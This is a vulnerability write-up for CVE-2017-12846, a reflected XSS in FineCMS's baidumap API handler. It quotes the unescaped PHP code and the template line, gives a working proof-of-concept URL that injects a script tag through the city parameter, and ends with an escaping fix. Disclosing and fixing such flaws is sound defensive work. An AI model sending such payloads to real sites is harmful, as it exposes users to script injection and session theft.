Unrestricted XSS in the latest version of FineCMS

CVE-2017-12846

The problem is in /finecms/dayrui/controllers/member/api.php

A third-party platform is invoked here, but input filtering is not strictly enforced. The vulnerable function is as follows:


public function baidumap() {

    // 'city' is split on commas after urldecode(); the first element becomes $city without any escaping
    $list = $this->input->get('city') ? explode(',', urldecode($this->input->get('city'))) : NULL;
    $city = isset($list[0]) ? $list[0] : '';
    $value = $this->input->get('value');
    // only values longer than 10 characters are kept, but they are not escaped either
    $value = strlen($value) > 10 ? $value : '';

    // the raw request values are handed straight to the template
    $this->template->assign(array(
        'city' => $city,
        'value' => $value,
        'list' => $list,
        'name' => $this->input->get('name'),
        'level' => (int)$this->input->get('level'),
        'width' => $this->input->get('width'),
        'height' => $this->input->get('height') - 30,
    ));
    $this->template->display('baidumap.html', 'admin');

}

Here we can see that the $value and $city parameters are not passed through any XSS filter. $value is subject to the 10-character length check, with the result that even a short domain name cannot be used to construct an effective XSS there; our $city parameter, however, is not filtered at all and is assigned directly to the template.
Let’s look at the template baidumap.html:


<div id="toolbar">
<div class="selCity">
<div class="right">
<a href="javascript:;" class="mark" onClick="addMarker();">{fc_lang('添加标注')}</a>
<a href="javascript:;" onClick="removeMarker();" class="map">{fc_lang('重置地图')}</a>
</div>
<strong id="curCity">{$city}</strong> [<a onClick="mapClose();" id="curCityText" href="javascript:;">{fc_lang('更换城市')}</a>]
</div>

You can see that our $city variable is injected directly into the <strong> tag, so we can construct the payload directly:


http://localhost/index.php?s=member&c=api&m=baidumap&city=<script>alert('1')</script>&value=123


(Not just baidumap: the upload and other functions later in the same file have the same problem, and the same fix applies.)
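As an added example (not FineCMS's own code), here is one way to harden the handler: escape every untrusted GET value before it is assigned to the template, so the request above is rendered as text inside <strong> instead of being parsed as markup. The helper names esc and buildBaidumapVars are assumptions, and $get stands in for CodeIgniter's $this->input->get().

```php
<?php
// Added example, not FineCMS code: the same template variables as baidumap(),
// but with every untrusted string escaped and every numeric field cast.

function esc(string $s): string {
    // Encode <, >, &, " and ' so the value is shown as text, never parsed as HTML.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// $get is an associative array of query parameters (assumption: stands in for
// $this->input->get()). Mirrors the original handler's logic, including its
// urldecode() of 'city', but escapes before anything reaches the template.
function buildBaidumapVars(array $get): array {
    $list  = isset($get['city']) ? explode(',', urldecode($get['city'])) : [];
    $list  = array_map('esc', $list);          // every element of the list is reflected too
    $city  = $list[0] ?? '';
    $value = $get['value'] ?? '';
    $value = strlen($value) > 10 ? esc($value) : '';

    return [
        'city'   => $city,
        'value'  => $value,
        'list'   => $list,
        'name'   => esc($get['name'] ?? ''),
        'level'  => (int)($get['level'] ?? 0),
        'width'  => (int)($get['width'] ?? 0),  // integer cast: no markup can survive
        'height' => (int)($get['height'] ?? 0) - 30,
    ];
}

// Constructed request using the payload from the advisory.
$vars = buildBaidumapVars([
    'city'  => "<script>alert('1')</script>",
    'value' => '123',
]);

// The template line that was vulnerable; $city is now inert text.
echo "<strong id=\"curCity\">{$vars['city']}</strong>\n";
```

Escaping in the template engine itself ({$city} rendered through an auto-escaping filter) is the more robust fix, since it also covers the other functions in api.php that assign raw input the same way.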